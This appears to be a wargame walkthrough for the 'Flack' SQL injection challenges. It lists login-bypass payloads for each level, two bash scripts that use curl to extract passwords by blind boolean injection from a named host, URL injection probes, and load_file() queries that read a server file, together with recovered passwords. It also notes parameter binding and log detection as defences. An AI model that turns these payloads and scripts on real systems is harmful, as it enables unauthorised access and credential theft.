# Flack wargame

Location

.::|[ FLACK ]|::.

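Login bypass

Each level's login form appears to place the submitted fields directly into its SQL query, so the quote, parenthesis and comment characters in the values below change the query's logic. The value pairs listed under each level are not labelled on the page; they read as the username and password fields (entered or recovered). Binding the fields as query parameters instead of concatenating them into the statement removes this whole class of bypass.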

- Level 1

' or 1=1 #
level1

or

' or '1'='1
' or '1'='1

- Level 2

' or 1=1) #
level2

or

' or '1'='1
' or '1'='1

- Level 3

admin') #
level3

- Level 4

# cat bypass-level4.sh 
#!/bin/bash
#
# Walkthrough helper for the wargame's login level 4 (blind, boolean-based).
#
# The script posts a multipart form field `fuser` (curl -F) whose value adds a
# condition to the login query, and treats the presence of the text in
# $marker in the response as "condition was true". Stage 1 probes the length
# of the `pass` column for user johnwayne; stage 2 compares one character
# position at a time against a fixed alphanumeric candidate list.
#
# Limitations visible in the code:
#   - If no length in 1..50 ever produces the marker, the loop simply ends and
#     50 is reported as the length.
#   - If no candidate matches a position, the last candidate tried ('Z') is
#     appended anyway, so the result needs to be verified by logging in.
#
# Defender's view: the oracle here is a response that differs depending on the
# injected condition. Bound query parameters remove the injection itself; the
# traffic is also easy to spot, since it is up to 50 + 62 * length POSTs that
# differ only in one number or one character.

target='http://flack.hkpco.kr/login/level4/index.php'
marker='Mail server error'
pass=""

# Stage 1: find the password length (first value in 1..50 that yields the marker).
for length in {1..50}; do
  reply=$(curl -s -F "fuser=johnwayne' and length(pass)=$length #" "$target" | grep "$marker")
  [ -z "$reply" ] || break
done
echo "Password length = $length"

# Stage 2: for each position, walk the candidates in the order a-z, 0-9, A-Z.
alphabet=({a..z} {0..9} {A..Z})
for ((i = 1; i <= length; i++)); do
  for char in "${alphabet[@]}"; do
    reply=$(curl -s -F "fuser=johnwayne' and substring(pass,$i,1)='$char" "$target" | grep "$marker")
    if [ -n "$reply" ]; then
      break
    fi
  done
  # $char is whatever the inner loop stopped on (or the last candidate).
  pass+=$char
  echo "pass[$i]='$char'"
done

echo "pass='$pass'"

johnwayne
drjgxpp

- Level 5

' union select md5('level5') #
level5

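Other/Blind

In level 1 below, the `uid` query parameter appears to reach the SQL statement as an unquoted number, so the conditions and `order by` clauses appended to it are executed and the page's response serves as a true/false signal. Validating `uid` as an integer and binding it as a query parameter would prevent this.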

- Level 1

http://flack.hkpco.kr/other/level1/members.php?uid=1 or id>1 order by name
http://flack.hkpco.kr/other/level1/members.php?uid=4 order by password
http://flack.hkpco.kr/other/level1/members.php?uid=4 order by pass
http://flack.hkpco.kr/other/level1/members.php?uid=4 and length(pass)=1

# cat other-level1.sh
#!/bin/bash
#
# Walkthrough helper for the wargame's "other" level 1 (blind, boolean-based,
# via the uid query parameter of members.php).
#
# Each request appends an extra condition to the uid value in the URL and
# treats the presence of the text in $marker in the response as "condition was
# true". Stage 1 probes the length of the `pass` column; stage 2 compares one
# character position at a time, sending each candidate as char(<decimal>) so
# the request contains no quote characters.
#
# Limitations visible in the code:
#   - If no length in 1..50 ever produces the marker, 50 is reported.
#   - If no candidate matches a position, the last candidate tried ('Z') is
#     appended anyway, so the result needs to be verified separately.
#   - `od -An -d` reads two-byte units; for a single input byte the printed
#     value equals the character code only on little-endian hosts.
#     NOTE(review): confirm before relying on it elsewhere.
#
# Defender's view: casting or binding uid as an integer removes the injection;
# in access logs the activity shows up as a burst of GETs to the same page
# whose uid value carries spaces, `length(` and `substring(`.

target='http://flack.hkpco.kr/other/level1/members.php?uid=4'
marker='jumper'
pass=""

# Stage 1: find the password length (first value in 1..50 that yields the marker).
for length in {1..50}; do
  reply=$(curl -s "$target and length(pass)=$length" | grep "$marker")
  [ -z "$reply" ] || break
done
echo "Password length = $length"

# Stage 2: for each position, walk the candidates in the order a-z, 0-9, A-Z.
alphabet=({a..z} {0..9} {A..Z})
for ((i = 1; i <= length; i++)); do
  for char in "${alphabet[@]}"; do
    # Character code of the candidate, with od's padding spaces stripped.
    decimal=$(printf '%s' "$char" | od -An -d | tr -d ' ')
    reply=$(curl -s "$target and substring(pass,$i,1)=char($decimal)" | grep "$marker")
    if [ -n "$reply" ]; then
      break
    fi
  done
  # $char is whatever the inner loop stopped on (or the last candidate).
  pass+=$char
  echo "pass[$i]='$char'"
done

echo "pass='$pass'"

jumper
mehijo123

- Level 3

http://flack.hkpco.kr/style.css

# echo -n /tmp/a000.temp | od -t x1 -An | sed 's/ /,0x/g'
# echo -n /tmp/a000.temp | od -An -t u1 | sed 's/  / /g' | tr ' ' ','

select load_file(char(0x2f,0x74,0x6d,0x70,0x2f,0x61,0x30,0x30,0x30,0x2e,0x74,0x65,0x6d,0x70));

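or, with the same path (/tmp/a000.temp) given as decimal byte values instead of hex (load_file() only returns data when the database account holds the FILE privilege and secure_file_priv permits the path, so the application's account should not be granted FILE):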

select load_file(char(47,116,109,112,47,97,48,48,48,46,116,101,109,112));

batman
skoda>batmobile
